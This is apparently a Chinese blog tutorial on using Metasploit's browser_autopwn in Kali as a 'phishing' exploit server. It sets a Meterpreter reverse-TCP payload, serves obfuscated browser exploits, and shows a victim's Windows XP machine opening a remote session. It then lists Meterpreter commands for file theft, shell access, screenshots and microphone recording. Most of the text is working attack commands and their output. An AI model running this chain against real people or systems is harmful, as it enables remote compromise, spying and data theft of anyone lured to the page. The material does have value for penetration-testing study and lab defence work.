标签:
本文介绍的autopwn是kali中自带的那个autopwn,
不是相对于bt5被删除的那个autopwn.
1.打开msfconsole, 找出autopwn目录及使用
msf > search autopwn Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/server/browser_autopwn normal HTTP Client Automatic Exploiter msf > use auxiliary/server/browser_autopwn msf auxiliary(browser_autopwn) >
2.配置 show options 查看
msf auxiliary(browser_autopwn) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf auxiliary(browser_autopwn) > set LHOST 192.168.154.133
LHOST => 192.168.154.133
msf auxiliary(browser_autopwn) > show options
Module options (auxiliary/server/browser_autopwn):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.154.133 yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits
msf auxiliary(browser_autopwn) >
3.开始钓鱼
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2015-03-29 13:30:57 +0800
msf auxiliary(browser_autopwn) > [*] Done in 1.298861072 seconds
[*] Starting exploit modules on host 192.168.154.133...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cqTfdfXcWFC
[*] Local IP: http://192.168.154.133:8080/cqTfdfXcWFC
[*] Server started.
4.等待对方浏览器访问
http://192.168.154.133:8080/fMOGHtWS
[*] Sending stage (30355 bytes) to 192.168.154.136 [*] Meterpreter session 1 opened (192.168.154.133:7777 -> 192.168.154.136:1083) at 2015-03-29 13:36:19 +0800 [*] Session ID 1 (192.168.154.133:7777 -> 192.168.154.136:1083) processing InitialAutoRunScript ‘migrate -f‘
5.开始一个会话
msf auxiliary(browser_autopwn) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter java/java admin @ admin-ca9ac4217 192.168.154.133:7777 -> 192.168.154.136:1083 (192.168.154.136) msf auxiliary(browser_autopwn) > sessions -i 1 [*] Starting interaction with 1... meterpreter >
6.会话进行
meterpreter > getuid Server username: admin meterpreter > sysinfo Computer : admin-ca9ac4217 OS : Windows XP 5.1 (x86) Meterpreter : java/java
meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information about active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session help Help menu info Displays information about a Post module interact Interacts with a channel irb Drop into irb scripting mode load Load one or more meterpreter extensions quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module use Deprecated alias for ‘load‘ write Writes data to a channel Stdapi: File system Commands ============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory Stdapi: Networking Commands =========================== Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table Stdapi: System Commands ======================= Command Description ------- ----------- execute Execute a command getuid Get the user that the server is running as ps List running processes shell Drop into a system command shell sysinfo Gets information about the remote system, such as OS Stdapi: User interface Commands =============================== Command Description ------- ----------- screenshot Grab a screenshot of the interactive desktop Stdapi: Webcam Commands ======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds meterpreter >
kali metasploit 之 autopwn 浏览器钓鱼,java漏洞
标签:
原文地址:http://www.cnblogs.com/alost/p/4375609.html
